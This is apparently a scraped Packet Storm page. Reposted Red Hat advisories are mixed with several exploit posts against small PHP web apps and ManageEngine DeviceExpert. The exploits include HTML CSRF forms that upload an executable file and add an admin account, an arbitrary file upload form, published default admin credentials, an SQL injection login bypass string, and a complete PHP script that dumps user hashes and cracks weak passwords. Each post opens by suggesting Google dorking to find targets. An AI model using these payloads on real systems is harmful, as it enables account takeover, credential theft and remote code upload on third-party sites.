Reservation Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Reservation Management System 1.0 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip                                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

  [+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New Menu</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Menu Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Category</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="cat" required="">  
                                                         <option value="9">Dessert</option>  
                                                        <option value="6">Main Course</option>  
                                                        <option value="7">Pasta</option>  
                                                        <option value="10">Rice</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Subcategory</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="subcat">  
                                                         <option>Drinks</option>  
                                                        <option>Lunch and Dinner</option>  
                                                        <option>Mirienda</option>  
                                                        <option>Non Combo Meal</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Description</label>  
                      <div class="col-lg-8">   
                        <textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Price</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Image</label>  
                      <div class="col-lg-8">   
                        <input type="file" class="form-control" name="image" id="title">  
                      </div>  
                  </div> 

                    
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>

    [+] Ev!L : http://127.0.0.1/reservation/images/shopping.php

-----------[+] Part 02 Add Admin [+]-------------------

[+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New User</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Full Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="username">Username</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="password">Password</label>  
                      <div class="col-lg-8">   
                        <input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">  
                      </div>  
                  </div> 

                                                                        
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Reservation Management System 1.0 Cross Site Request Forgery

Red Hat Security Advisory 2024-6663-03 - An update for kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6663.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 security updateAdvisory ID:        RHSA-2024:6663-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6663Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2024-41090====================================================================Summary: An update for kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel.  This patch module is targeted for kernel-4.18.0-305.120.1.el8_4.Security Fix(es):* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-41090References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2299240https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-6663-03

Online Job Recruitment Portal Project version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Job Recruitment Portal project v1.0 Remote File Upload Vulnerability                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12866/online-job-recruitment-portal-php-project-source-code                           |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 10.

[+] Set the target site link Save changes and apply . 

[+] infected file : rec_detail.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Recruitment Form</title>  
</head>  
<body>  
    <h1>Recruitment Form</h1>  
    <form action="http://127.0.0.1/Recruitment-Portal-master/rec_detail.php" method="POST" enctype="multipart/form-data">  
          
        <label for="photograph">Photograph:</label>  
        <input type="file" id="photograph" name="photograph" required><br><br>

          
        <label for="placeofbirth">Place of Birth:</label>  
        <input type="text" id="placeofbirth" name="placeofbirth" required><br><br>

          
        <label for="fhname">Father's/Husband's Name:</label>  
        <input type="text" id="fhname" name="fhname" required><br><br>

          
        <label for="marital_status">Marital Status:</label>  
        <select id="marital_status" name="marital_status">  
            <option value="single">Single</option>  
            <option value="married">Married</option>  
            <option value="divorced">Divorced</option>  
        </select><br><br>

          
        <label for="Nationality">Nationality:</label>  
        <select id="Nationality" name="Nationality">  
            <option value="national1">Nationality 1</option>  
            <option value="national2">Nationality 2</option>  
        </select><br><br>

          
        <label for="handicapped">Handicapped:</label>  
        <select id="handicapped" name="handicapped">  
            <option value="yes">Yes</option>  
            <option value="no">No</option>  
        </select><br><br>

          
        <label for="religion">Religion:</label>  
        <select id="religion" name="religion">  
            <option value="religion1">Religion 1</option>  
            <option value="religion2">Religion 2</option>  
        </select><br><br>

          
        <label for="blood">Blood Group:</label>  
        <select id="blood" name="blood">  
            <option value="A+">A+</option>  
            <option value="B+">B+</option>  
            <option value="AB+">AB+</option>  
            <option value="O+">O+</option>  
            <option value="O-">O-</option>  
        </select><br><br>

          
        <label for="mark">Identification Mark:</label>  
        <input type="text" id="mark" name="mark" required><br><br>

          
        <input type="submit" value="Submit">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/Recruitment-Portal-master/images/.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Job Recruitment Portal Project 1.0 Arbitrary File Upload

Red Hat Security Advisory 2024-6662-03 - An update for python-setuptools is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6662.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-setuptools security updateAdvisory ID:        RHSA-2024:6662-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6662Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for python-setuptools is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 7-ELS Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7-ELS/html/7-ELS_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6662-03

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

**IFSC Code Finder Portal 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4c8714f261d6bcdc7f5ee89b4f1473342ced816a03f174b9a8bc607a329616e0

Download | Favorite | View

**IFSC Code Finder Portal 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : IFSC Code Finder Portal v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/ifsc-code-finder-project-using-php/                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = Test@123[+] http://127.0.0.1/ifscfinder/admin/login.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

IFSC Code Finder Portal 1.0 Insecure Settings

Red Hat Security Advisory 2024-6661-03 - An update for python3-setuptools is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6661.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python3-setuptools security updateAdvisory ID:        RHSA-2024:6661-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6661Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for python3-setuptools is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 7-ELS Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7-ELS/html/7-ELS_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6661-03

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

**GYM Management System 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5ee11f413d4f6dbbb71c2d782424145f8284d96790518d7c0e3923c5bd409844

Download | Favorite | View

**GYM Management System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : GYM Management System 1.0 Insecure Settings Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/gym-management-system-using-php-and-mysql/                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin@gmail.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

GYM Management System 1.0 Insecure Settings

Red Hat Security Advisory 2024-6656-03 - Migration Toolkit for Runtimes 1.2.7 release Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a cross site scripting vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6656.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Migration Toolkit for Runtimes security, bug fix and enhancement updateAdvisory ID:        RHSA-2024:6656-03Product:            Migration Toolkit for RuntimesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6656Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2022-36033====================================================================Summary: Migration Toolkit for Runtimes 1.2.7 releaseRed Hat Product Security has rated this update as having a security impact of Moderate.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Migration Toolkit for Runtimes 1.2.7 ImagesSecurity Fix(es):* org.jsoup/jsoup: The jsoup cleaner may incorrectly sanitize crafted XSS attempts if SafeList.preserveRelativeLinks is enabled (CVE-2022-36033)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2022-36033References:https://access.redhat.com/security/updates/classification/#moderatehttps://issues.redhat.com/browse/WINDUPRULE-1050

Red Hat Security Advisory 2024-6656-03

Emergency Ambulance Hiring Portal version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 Auth By Pass Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/eahp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Emergency Ambulance Hiring Portal 1.0 SQL Injection

ManageEngine DeviceExpert version 5.9.7 build 5970 allows for usernames and salted MD5 password hashes to be disclosed.

    ====================================================================================================================================| # Title     : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://manageengine.com/                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.[+] LIne 87 set your targer .    [+] usage : C:\www\test>php 3.php[+] Payload :<?phpclass ManageEngineDeviceExpert {    private $host;    private $port;    private $ssl;    public function __construct($host, $port = 6060, $ssl = true) {        $this->host = $host;        $this->port = $port;        $this->ssl = $ssl;    }    private function sendRequest($path) {        $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function getUsers() {        echo "Reading users from master...\n";        $response = $this->sendRequest('/ReadUsersFromMasterServlet');        if (!$response) {            echo "Connection failed\n";            return null;        }        if (strpos($response, '<discoverydata>') !== false) {            preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/', $response, $matches);            echo "Found " . count($matches[0]) . " users\n";            return $matches[0];        } else {            echo "Could not find any users\n";            return null;        }    }    public function parseUserData($user) {        if (!$user) return null;        preg_match('/<username>([^<]+)<\/username>/', $user, $username);        preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash);        preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role);        preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email);        preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt);        $hash = base64_decode($encoded_hash[1]);        $password = null;        $weak_passwords = ['12345', 'admin', 'password', $username[1]];        foreach ($weak_passwords as $weak_password) {            if (md5($weak_password . $salt[1]) == bin2hex($hash)) {                $password = $weak_password;                break;            }        }        return [            'username' => $username[1],            'password' => $password,            'hash' => bin2hex($hash),            'role' => $role[1],            'email' => $email[1],            'salt' => $salt[1]        ];    }    public function run() {        $users = $this->getUsers();        if (!$users) return;        foreach ($users as $user) {            $user_data = $this->parseUserData($user);            if (!$user_data) continue;            echo "User: " . $user_data['username'] . "\n";            echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";            echo "Hash: " . $user_data['hash'] . "\n";            echo "Role: " . $user_data['role'] . "\n";            echo "Email: " . $user_data['email'] . "\n";            echo "Salt: " . $user_data['salt'] . "\n";            echo "----------------------------\n";        }    }}// استخدام الكلاس$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');$deviceExpert->run();?>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Latest News